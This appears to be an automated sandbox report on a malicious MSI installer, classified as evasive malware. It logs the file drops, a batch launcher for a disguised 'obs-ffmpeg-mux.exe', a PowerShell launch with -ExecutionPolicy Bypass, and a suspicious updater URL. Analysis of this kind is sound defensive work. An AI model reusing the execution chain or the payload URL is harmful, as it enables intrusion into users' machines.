Source: powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: https://staticmaxepress.com/updater2.phpx
Source: obs-ffmpeg-mux.exe, obs-ffmpeg-mux.exe, 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://streams.videolan.org/upload/
Source: Setup.msi, 5924ec.msi.1.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 172.67.162.17:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5924ec.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2E04.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2E72.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2EB2.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2EF1.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2F50.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2F90.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2FCF.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4EE1.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{337A659D-79FE-4CED-9D18-362BBF6F3DBC}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI56A3.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI56B3.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5924ef.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5924ef.msi	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI2E04.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF649AA2EE0	11_2_00007FF649AA2EE0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF649AA2A10	11_2_00007FF649AA2A10
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEB8D0	11_2_00007FF8A7BEB8D0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BED8D0	11_2_00007FF8A7BED8D0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C128B0	11_2_00007FF8A7C128B0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C64840	11_2_00007FF8A7C64840
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEE820	11_2_00007FF8A7BEE820
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C06820	11_2_00007FF8A7C06820
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C087F0	11_2_00007FF8A7C087F0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEB790	11_2_00007FF8A7BEB790
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BED700	11_2_00007FF8A7BED700
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE1730	11_2_00007FF8A7BE1730
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEB6A0	11_2_00007FF8A7BEB6A0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C0C650	11_2_00007FF8A7C0C650
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C90640	11_2_00007FF8A7C90640
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BED5C0	11_2_00007FF8A7BED5C0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEB5C0	11_2_00007FF8A7BEB5C0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C03580	11_2_00007FF8A7C03580
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C23560	11_2_00007FF8A7C23560
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEA520	11_2_00007FF8A7BEA520
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEE4C0	11_2_00007FF8A7BEE4C0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C244D0	11_2_00007FF8A7C244D0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C024D0	11_2_00007FF8A7C024D0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEB460	11_2_00007FF8A7BEB460
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C033E0	11_2_00007FF8A7C033E0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEB380	11_2_00007FF8A7BEB380
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE13A0	11_2_00007FF8A7BE13A0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C25350	11_2_00007FF8A7C25350
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C26350	11_2_00007FF8A7C26350
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C24330	11_2_00007FF8A7C24330
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C0F2C0	11_2_00007FF8A7C0F2C0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEC2F0	11_2_00007FF8A7BEC2F0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE7260	11_2_00007FF8A7BE7260
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BED210	11_2_00007FF8A7BED210
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEC1A0	11_2_00007FF8A7BEC1A0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEA1B0	11_2_00007FF8A7BEA1B0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEB150	11_2_00007FF8A7BEB150
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C11160	11_2_00007FF8A7C11160
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C130A0	11_2_00007FF8A7C130A0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BED030	11_2_00007FF8A7BED030
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEB030	11_2_00007FF8A7BEB030
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C02F20	11_2_00007FF8A7C02F20
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEDEF0	11_2_00007FF8A7BEDEF0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE6E70	11_2_00007FF8A7BE6E70
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C21E10	11_2_00007FF8A7C21E10
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEBE20	11_2_00007FF8A7BEBE20
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BFFDF0	11_2_00007FF8A7BFFDF0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C12D90	11_2_00007FF8A7C12D90
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE9D50	11_2_00007FF8A7BE9D50
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C02D20	11_2_00007FF8A7C02D20
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C22CC0	11_2_00007FF8A7C22CC0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BECCE0	11_2_00007FF8A7BECCE0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C04C80	11_2_00007FF8A7C04C80
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C13C00	11_2_00007FF8A7C13C00
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE1C30	11_2_00007FF8A7BE1C30
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C02BF0	11_2_00007FF8A7C02BF0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C2CBE0	11_2_00007FF8A7C2CBE0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE3B87	11_2_00007FF8A7BE3B87
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C42B80	11_2_00007FF8A7C42B80
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C12B40	11_2_00007FF8A7C12B40
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C22B60	11_2_00007FF8A7C22B60
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C25B00	11_2_00007FF8A7C25B00
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C8DAA0	11_2_00007FF8A7C8DAA0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE9A50	11_2_00007FF8A7BE9A50
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEBA70	11_2_00007FF8A7BEBA70
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE99C0	11_2_00007FF8A7BE99C0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C05980	11_2_00007FF8A7C05980
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BE1990	11_2_00007FF8A7BE1990
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BEE9A0	11_2_00007FF8A7BEE9A0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C109B0	11_2_00007FF8A7C109B0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7BED9B0	11_2_00007FF8A7BED9B0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8A7C14920	11_2_00007FF8A7C14920
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8BFB568B0	11_2_00007FF8BFB568B0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8BFB64B4A	11_2_00007FF8BFB64B4A
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8BFB63AA7	11_2_00007FF8BFB63AA7
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8BFB58DB0	11_2_00007FF8BFB58DB0
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8BFB87508	11_2_00007FF8BFB87508

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: String function: 00007FF8BFB62038 appears 32 times
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: String function: 00007FF8A7C056C0 appears 288 times

Source: avcodec-60.dll.1.dr	Static PE information: Number of sections : 13 > 10
Source: avutil-58.dll.1.dr	Static PE information: Number of sections : 12 > 10
Source: swresample-4.dll.1.dr	Static PE information: Number of sections : 12 > 10
Source: swscale-7.dll.1.dr	Static PE information: Number of sections : 12 > 10
Source: zlib.dll.1.dr	Static PE information: Number of sections : 12 > 10
Source: avformat-60.dll.1.dr	Static PE information: Number of sections : 12 > 10

Source: api-ms-win-core-handle-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found

Source: Setup.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs Setup.msi
Source: Setup.msi	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs Setup.msi
Source: Setup.msi	Binary or memory string: OriginalFilenameDataUploader.dllF vs Setup.msi
Source: Setup.msi	Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs Setup.msi
Source: Setup.msi	Binary or memory string: OriginalFilenameucrtbase.dllj% vs Setup.msi
Source: Setup.msi	Binary or memory string: OriginalFilenamevcruntime140.dllT vs Setup.msi
Source: Setup.msi	Binary or memory string: OriginalFilenamemsvcp140.dllT vs Setup.msi
Source: Setup.msi	Binary or memory string: OriginalFilenameMicrosoft.Web.WebView2.Core.dll vs Setup.msi
Source: Setup.msi	Binary or memory string: OriginalFilenameMicrosoft.UI.Xaml.dllD vs Setup.msi
Source: Setup.msi	Binary or memory string: OriginalFilenameembeddeduiproxy.dllF vs Setup.msi

Source: classification engine

Classification label: mal72.evad.winMSI@17/88@1/1

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CML6427.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF89A4D5824D084A0C.TMP

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\suriqk.bat" "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe""

Source: C:\Windows\SysWOW64\msiexec.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\Payload

Jump to behavior

Source: obs-ffmpeg-mux.exe	String found in binary or memory: #EXT-X-START value isinvalid, it will be ignored
Source: obs-ffmpeg-mux.exe	String found in binary or memory: #EXT-X-START:
Source: obs-ffmpeg-mux.exe	String found in binary or memory: prefer to use #EXT-X-START if it's in playlist instead of live_start_index
Source: obs-ffmpeg-mux.exe	String found in binary or memory: start/stop audio
Source: obs-ffmpeg-mux.exe	String found in binary or memory: start/stop audio

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Setup.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D44AA04F2F32608A63BB6BADF4D8892C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\suriqk.bat" "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe""
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe"
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D44AA04F2F32608A63BB6BADF4D8892C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\suriqk.bat" "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe""	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
